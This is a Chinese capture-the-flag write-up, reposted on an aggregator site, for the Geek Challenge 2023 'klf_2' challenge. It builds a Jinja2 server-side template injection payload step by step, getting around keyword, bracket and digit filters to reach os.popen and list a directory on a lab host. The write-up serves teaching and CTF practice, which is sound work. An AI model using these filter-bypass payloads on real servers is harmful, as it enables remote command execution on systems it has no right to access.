[Geek Challenge 2023] klf_2详解

2023-12-08 06:10:02
开发
33

考点

SSTI、join拼接绕过

fuzz测试后发现过滤了很多关键字
在这里插入图片描述
我们先试试构造__class__

{% set po=dict(po=1,p=2)|join()%}  					 //构造pop
{% set a=lipsum|string|list|attr(po)(18)%} 			 //构造_
{% set cl=(a,a,dict(cla=a,ss=a)|join,a,a)|join()%}   //构造__class__
{% set cmd=cl%}
{
  {cmd}}   //调用

构造成功
在这里插入图片描述当我们添加过滤器attr后，修改为{% set cmd=()|attr(cl)%}

我们继续构造，查看下当前子类

{% set po=dict(po=1,p=2)|join()%}
{% set a=lipsum|string|list|attr(po)(18)%}
{% set cl=(a,a,dict(cla=a,ss=a)|join,a,a)|join()%}
{% set ba=(a,a,dict(ba=a,se=a)|join,a,a)|join()%}
{% set su=(a,a,dict(subcla=a,sses=a)|join,a,a)|join()%}
{% set cmd=()|attr(cl)|attr(ba)|attr(su)()%}
{
  {cmd}}

在这里插入图片描述

复制一下，查找class 'os._wrap_close下标为17
在这里插入图片描述
由于我们fuzz测试后知道不能用[]，那么我们用__getitem__()代替

{% set po=dict(po=1,p=2)|join()%}
{% set a=lipsum|string|list|attr(po)(18)%}
{% set cl=(a,a,dict(cla=a,ss=a)|join,a,a)|join()%}
{% set ba=(a,a,dict(ba=a,se=a)|join,a,a)|join()%}
{% set su=(a,a,dict(subcla=a,sses=a)|join,a,a)|join()%}
{% set ge=(a,a,dict(geti=a,tem=a)|join,a,a)|join()%}
{% set cmd=()|attr(cl)|attr(ba)|attr(su)()|attr(ge)(117)%}
{
  {cmd}}

找到os命令执行的模块
在这里插入图片描述

然后就是初始化返回可用函数，再一次__getitem__()去调用popen函数
我们重新定义pp为调用的popen函数

http://192.168.1.104:32774/secr3ttt?klf={% set po=dict(po=1,p=2)|join()%}
{% set a=lipsum|string|list|attr(po)(18)%}
{% set cl=(a,a,dict(cla=a,ss=a)|join,a,a)|join()%}
{% set ba=(a,a,dict(ba=a,se=a)|join,a,a)|join()%}
{% set su=(a,a,dict(subcla=a,sses=a)|join,a,a)|join()%}
{% set ge=(a,a,dict(geti=a,tem=a)|join,a,a)|join()%}
{% set in=(a,a,dict(in=a,it=a)|join,a,a)|join()%}
{% set gl=(a,a,dict(glo=a,bals=a)|join,a,a)|join()%}
{% set p=dict(po=a,pen=a)|join()%}
{% set pp=()|attr(cl)|attr(ba)|attr(su)()|attr(ge)(117)|attr(in)|attr(gl)|attr(ge)(p)%}
{
  {pp}}

在这里插入图片描述然后就是如何构造命令，由于过滤了关键字，那么我们要先得到chr()函数
要利用到__builtins__模块以及join拼接的chr字符
也就是添加下面三句

{% set ch=dict(ch=a,r=a)|join%}
{% set bu=(a,a,dict(bui=a,ltins=a)|join,a,a)|join()%}
{% set chhr=()|attr(cl)|attr(ba)|attr(su)()|attr(ge)(117)|attr(in)|attr(gl)|attr(ge)(bu)|attr(ge)(ch)%}

继续构造命令，假设构造ls /app/
考虑到过滤了一些数字，用全角字符绕过

{% set l=dict(l=a,s=a)|join%}
{% set ap=dict(ap=a,p=a)|join%}
{% set ch=dict(ch=a,r=a)|join%}
{% set bu=(a,a,dict(bui=a,ltins=a)|join,a,a)|join()%}
{% set chhr=()|attr(cl)|attr(ba)|attr(su)()|attr(ge)(117)|attr(in)|attr(gl)|attr(ge)(bu)|attr(ge)(ch)%}
{% set sz=(l,chhr(3２),chhr(4７),ap,chhr(4７))%}

除此之外还要构造read()

{% set re=dict(re=a,ad=a)|join%}

命令执行语句

{% set cmd=pp(sz)|attr(re)()%}

整理一下得到最终payload

http://192.168.1.104:32774/secr3ttt?klf={% set po=dict(po=1,p=2)|join()%}
{% set a=lipsum|string|list|attr(po)(18)%}
{% set cl=(a,a,dict(cla=a,ss=a)|join,a,a)|join()%}
{% set ba=(a,a,dict(ba=a,se=a)|join,a,a)|join()%}
{% set su=(a,a,dict(subcla=a,sses=a)|join,a,a)|join()%}
{% set ge=(a,a,dict(geti=a,tem=a)|join,a,a)|join()%}
{% set in=(a,a,dict(in=a,it=a)|join,a,a)|join()%}
{% set gl=(a,a,dict(glo=a,bals=a)|join,a,a)|join()%}
{% set bu=(a,a,dict(bui=a,ltins=a)|join,a,a)|join()%}
{% set p=dict(po=a,pen=a)|join()%}
{% set ch=dict(ch=a,r=a)|join%}
{% set l=dict(l=a,s=a)|join%}
{% set ap=dict(ap=a,p=a)|join%}
{% set re=dict(re=a,ad=a)|join%}
{% set pp=()|attr(cl)|attr(ba)|attr(su)()|attr(ge)(117)|attr(in)|attr(gl)|attr(ge)(p)%}
{% set chhr=()|attr(cl)|attr(ba)|attr(su)()|attr(ge)(117)|attr(in)|attr(gl)|attr(ge)(bu)|attr(ge)(ch)%}
{% set sz=(l,chhr(3２),chhr(4７),ap,chhr(4７))|join%}
{% set cmd=pp(sz)|attr(re)()%}
{
  {cmd}}

成功读取目录
在这里插入图片描述

原文地址:https://blog.csdn.net/m0_73512445/article/details/134867109 本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：https://www.suanlizi.com/kf/1732885200586805248.html 如若内容造成侵权/违法违规/事实不符，请联系《酸梨子》网邮箱：1419361763@qq.com进行投诉反馈，一经查实，立即删除！

阅读全部

[Geek Challenge 2023] klf_2详解

考点

相关推荐

最近更新

热门阅读